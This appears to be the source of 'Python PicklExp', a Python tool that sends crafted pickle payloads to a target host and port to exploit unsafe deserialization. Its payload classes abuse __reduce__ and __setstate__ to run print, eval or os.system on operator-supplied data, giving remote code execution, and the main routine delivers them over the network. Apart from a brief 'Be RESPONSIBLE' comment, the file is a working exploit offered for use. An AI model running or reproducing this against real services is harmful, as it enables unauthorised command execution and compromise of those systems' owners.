96 lines
2.4 KiB
Python
96 lines
2.4 KiB
Python
|
#BSD 3-Clause, (C) Alfred Manville 2022
|
||
|
#Be RESPONSIBLE when using this!
|
||
|
import networker as net
|
||
|
import pickle
|
||
|
import traceback
|
||
|
import sys
|
||
|
|
||
|
#Payloads:
|
||
|
#State payloads only work if the Object is available at the target
|
||
|
|
||
|
class StatePXP:
|
||
|
def __init__(self, data):
|
||
|
self.data = data
|
||
|
def __getstate__(self):
|
||
|
return self.data
|
||
|
def __setstate__(self, state):
|
||
|
self.data = state
|
||
|
print(self.data)
|
||
|
|
||
|
class ReducePXP:
|
||
|
def __init__(self, data):
|
||
|
self.data = data
|
||
|
def __reduce__(self):
|
||
|
return print, (self.data,)
|
||
|
|
||
|
class StateEXP:
|
||
|
def __init__(self, data):
|
||
|
self.data = data
|
||
|
def __getstate__(self):
|
||
|
return self.data
|
||
|
def __setstate__(self, state):
|
||
|
self.data = state
|
||
|
eval(self.data)
|
||
|
|
||
|
class ReduceEXP:
|
||
|
def __init__(self, data):
|
||
|
self.data = data
|
||
|
def __reduce__(self):
|
||
|
return eval, (self.data,)
|
||
|
|
||
|
class ReduceSXP:
|
||
|
def __init__(self, data):
|
||
|
self.data = data
|
||
|
def __reduce__(self):
|
||
|
import os
|
||
|
return os.system, (self.data,)
|
||
|
|
||
|
payloads = (StatePXP(""), ReducePXP(""), StateEXP(""), ReduceEXP(""), ReduceSXP(""))
|
||
|
payload = None
|
||
|
taddr = ""
|
||
|
tport = 0
|
||
|
plid = 0
|
||
|
pldata = ""
|
||
|
|
||
|
def onx(a):
|
||
|
pass
|
||
|
|
||
|
def ony(a, m):
|
||
|
pass
|
||
|
|
||
|
def main():
|
||
|
conn = net.Connection(None, net.PickleTranslate(), onx, ony, onx)
|
||
|
print("Running Exploit @ " + taddr + ":" + str(tport))
|
||
|
print("Exploit: " + str(type(payload)) + " ; Data: " + pldata)
|
||
|
try:
|
||
|
conn.connect((taddr, tport))
|
||
|
print("Exploiting...")
|
||
|
conn.send(taddr+":"+str(tport), payload)
|
||
|
print("Exploited!")
|
||
|
except:
|
||
|
print(traceback.format_exc())
|
||
|
conn.close()
|
||
|
exit
|
||
|
|
||
|
if __name__ == "__main__":
|
||
|
print("Python PicklExp (C) Alfred Manville 2022 BSD-3-Clause")
|
||
|
if len(sys.argv) > 1:
|
||
|
taddr = sys.argv[1]
|
||
|
else:
|
||
|
taddr = input("Enter the target address: ")
|
||
|
if len(sys.argv) > 2:
|
||
|
tport = int(sys.argv[2])
|
||
|
else:
|
||
|
tport = int(input("Enter the target port: "))
|
||
|
if len(sys.argv) > 3:
|
||
|
plid = int(sys.argv[3]) - 1
|
||
|
else:
|
||
|
plid = int(input("Enter the payload position " + str(payloads) + " : ")) - 1
|
||
|
if len(sys.argv) > 4:
|
||
|
pldata = sys.argv[4]
|
||
|
else:
|
||
|
pldata = input("Enter the payload data: ")
|
||
|
payload = payloads[plid]
|
||
|
payload.data = pldata
|
||
|
main()
|